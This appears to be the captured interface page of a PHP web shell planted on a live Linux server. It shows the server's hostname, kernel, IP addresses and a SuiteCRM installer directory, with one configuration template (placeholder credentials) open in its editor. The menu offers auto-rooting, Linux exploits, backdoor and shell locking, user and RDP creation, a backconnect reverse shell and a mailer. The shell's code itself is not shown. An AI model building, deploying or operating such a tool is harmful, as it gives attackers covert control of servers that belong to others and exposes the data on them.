Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
suitecrm /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
.env.local
104
B
-rw-r--r--
.htaccess
100
B
-rw-r--r--
_.htaccess
4.05
KB
-rw-r--r--
clone.php
16.49
KB
-rw-r--r--
config.php
12.21
KB
-rw-r--r--
config_override.php
188
B
-rw-r--r--
config_si.php
1.08
KB
-rw-r--r--
edit.php
4.68
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
9.43
KB
-rw-r--r--
fileindex.php
324
B
-rw-r--r--
get_user.php
947
B
-rw-r--r--
import.php
3.69
KB
-rw-r--r--
info.xml
3.67
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
11.1
KB
-rw-r--r--
install.xml
952
B
-rw-r--r--
md5
3.9
KB
-rw-r--r--
notes.txt
1.59
KB
-rw-r--r--
status.json
234
B
-rw-r--r--
update_pass.php
558
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config_si.php
<?php $sugar_config_si = array ( 'dbUSRData' => 'same', 'default_currency_iso4217' => 'USD', 'default_currency_name' => 'US Dollar', 'default_currency_significant_digits' => '2', 'default_currency_symbol' => '$', 'default_date_format' => 'Y-m-d', 'default_decimal_seperator' => '.', 'default_export_charset' => 'ISO-8859-1', 'default_language' => 'en_us', 'default_locale_name_format' => 's f l', 'default_number_grouping_seperator' => ',', 'default_time_format' => 'H:i', 'export_delimiter' => ',', 'setup_db_admin_password' => '[[softdbpass]]', 'setup_db_admin_user_name' => '[[softdbuser]]', 'setup_db_port_num' => '', 'setup_db_create_database' => 1, 'setup_db_database_name' => '[[softdb]]', 'setup_db_drop_tables' => 0, 'setup_db_host_name' => '[[softdbhost]]', 'demoData' => 'no', 'setup_db_type' => 'mysql', 'setup_db_username_is_privileged' => true, 'setup_site_admin_password' => '[[admin_pass_plain]]', 'setup_site_admin_user_name' => '[[admin_username]]', 'setup_site_url' => '[[softurl]]/public', 'setup_system_name' => '[[site_name]]', );
Close